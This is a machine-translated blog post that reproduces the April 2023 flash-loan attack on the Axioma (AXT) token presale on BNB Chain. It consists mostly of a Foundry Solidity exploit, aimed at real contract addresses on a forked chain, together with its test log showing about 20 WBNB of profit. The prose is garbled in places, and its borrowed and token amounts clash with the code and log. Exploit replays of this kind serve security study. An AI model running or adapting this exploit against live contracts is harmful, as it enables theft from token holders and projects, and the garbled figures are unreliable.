[Blockchain security - DEFI attack recurrence] 000-20230424 Axioma
From today onwards, I will insist on exporting a reproduction of DEFI attack and writing my own POC code every day, to encourage everyone.
The entire document will be divided into several parts, including attack introduction, attack analysis, POC code writing and reflection. The list is for reference DeFiHackLabs.
# Attack Introduction
On April 23, 2023, @HypernativeLabsit was announced that the tokens BSCon the chain had been attacked, and the attackers used the profits obtained from the pre-sale of the tokens , which was about $7K.AXTArbi价格差21WBNB
attack Tx hashas0x05eabbb665a5b99490510d0b3f93565f394914294ab4d609895e525b43ff16f2
attack analysis
Using phalconit for analysis , it was found that this is a flash loan attack.
The attacker borrows money 0xaaa75b2ae8314ef738062da56e0f09d2d53c43d2through DPPoraclethe flash loan function in exchange for .flashLoan32.5 WBNB
The attacker interacts DPPFlashLoanCallwith Axiomathe pre-sale contract in the callback function of the flash loan contract and obtains .0x2c25aee99ed08a61e7407a5674bc2d1a72b5d8e39750 AXT
The PancakeSwapadmiral AXTsold it, replaced it WBNB, repaid the flash loan, and the attack was completed.
POC writing
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.0;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~ 7K US$
// Event : Axioma Hack
// Analysis via https://explorer.phalcon.xyz/tx/bsc/0x05eabbb665a5b99490510d0b3f93565f394914294ab4d609895e525b43ff16f2
// Attacker : 0xaaa75b2ae8314ef738062da56e0f09d2d53c43d2
// Vulnerable Contract : 0x2c25aee99ed08a61e7407a5674bc2d1a72b5d8e3 (AXT Presale Contract)
// Vulnerable Contract : 0x6a3fa7d2c71fd7d44bf3a2890aa257f34083c90f (Pancake Swap Contract)
// Attack Tx : https://bscscan.com/tx/0x05eabbb665a5b99490510d0b3f93565f394914294ab4d609895e525b43ff16f2
// @Info
// FlashLoan Attack, arbitrage
// @Analysis
// DefiHackLab : https://twitter.com/HypernativeLabs/status/1650382589847302145
address constant DPPORACLE_ADDRESS = 0xFeAFe253802b77456B4627F8c2306a9CeBb5d681;
address constant PRESALE_ADDRESS = 0x2C25aEe99ED08A61e7407A5674BC2d1A72B5D8E3;
address constant SWAP_ADDRESS = 0x6a3Fa7D2C71fd7D44BF3a2890aA257F34083c90f;
address payable constant PANCAKE_ROUTER = payable(0x10ED43C718714eb63d5aA57B78B54704E256024E);
address constant WBNB_ADDRESS = 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c;
address constant AXT_ADDRESS = 0xB6CF5b77B92a722bF34f6f5D6B1Fe4700908935E;
uint256 constant BORROW_AMOUNT = 30 ether;
contract AxiomaHack is Test { // EOA Simulation
function setUp() public {
vm.createSelectFork("bsc",27620320); // Go back before hacking time
console.log("start with block %d",27620320);
console.log("AxiomaHack address %s",address(this));
}
function testExploit() public {
console.log("start hacking...");
emit log_named_decimal_uint("[Start] Attacker WBNB Balance", WBNB(WBNB_ADDRESS).balanceOf(address(this)), 18);
Exploit exploit = new Exploit();
exploit.attack();
console.log("finish hacking...");
emit log_named_decimal_uint("[End] Attacker WBNB Balance", WBNB(WBNB_ADDRESS).balanceOf(address(this)), 18);
}
}
contract Exploit is Test{
address owner;
constructor() {
owner = msg.sender;
console.log("Exploit address %s",address(this));
}
function attack() external {
IDPPORACLE(DPPORACLE_ADDRESS).flashLoan(BORROW_AMOUNT, 0, address(this), "1");
}
function DPPFlashLoanCall(
address sender,
uint256 baseAmount,
uint256 quoteAmount,
bytes calldata data
) external{
console.log("receiving flashLoan");
emit log_named_decimal_uint("[Hacking] Exploit WBNB Balance", WBNB(WBNB_ADDRESS).balanceOf(address(this)), 18);
WBNB(WBNB_ADDRESS).withdraw(BORROW_AMOUNT);
IPresale(PRESALE_ADDRESS).buyToken{value:BORROW_AMOUNT}();
emit log_named_decimal_uint("[Hacking] Exploit WBNB Balance", WBNB(WBNB_ADDRESS).balanceOf(address(this)), 18);
uint256 axtAmount = IERC20(AXT_ADDRESS).balanceOf(address(this));
emit log_named_decimal_uint("[Hacking] Exploit AXT Balance", axtAmount, 18);
console.log("Swap AXT for WBNB");
address[] memory paths = new address[](2);
paths[0] = AXT_ADDRESS;
paths[1] = WBNB_ADDRESS;
IERC20(AXT_ADDRESS).approve(PANCAKE_ROUTER,type(uint256).max);
IPancakeRouter(PANCAKE_ROUTER).swapExactTokensForTokensSupportingFeeOnTransferTokens(
axtAmount,1,paths,address(this),block.timestamp *2
);
emit log_named_decimal_uint("[Hacked] Exploit WBNB Balance", WBNB(WBNB_ADDRESS).balanceOf(address(this)), 18);
WBNB(WBNB_ADDRESS).transfer(msg.sender, BORROW_AMOUNT + 1 ether);
WBNB(WBNB_ADDRESS).transfer(owner, WBNB(WBNB_ADDRESS).balanceOf(address(this)));
}
fallback() external payable {
}
}
/* -------------------- Interface -------------------- */
interface IDPPORACLE{
function flashLoan(
uint256 baseAmount,
uint256 quoteAmount,
address _assetTo,
bytes calldata data
) external;
}
interface IPresale {
function buyToken() external payable;
}
The output is as follows:
[PASS] testExploit() (gas: 3103102)
Logs:
start with block 27620320
AxiomaHack address 0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496
start hacking...
[Start] Attacker WBNB Balance: 0.000000000000000000
Exploit address 0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f
receiving flashLoan
[Hacking] Exploit WBNB Balance: 30.000000000000000000
[Hacking] Exploit WBNB Balance: 0.000000000000000000
[Hacking] Exploit AXT Balance: 9000.000000000000000000
Swap AXT for WBNB
[Hacked] Exploit WBNB Balance: 50.765903205913794244
finish hacking...
[End] Attacker WBNB Balance: 19.765903205913794244
Test result: ok. 1 passed; 0 failed; finished in 565.12ms
The Foundry test results show that the use of lightning loan arbitrage has successfully harvested 20WBNB.
to reflect
To be honest, I don't think this is a DeFi attack, it's just "moving bricks" and using flash loans to amplify profits. The blockchain is like a dark forest, and the benefits are huge. You have to grab the fruits and protect yourself.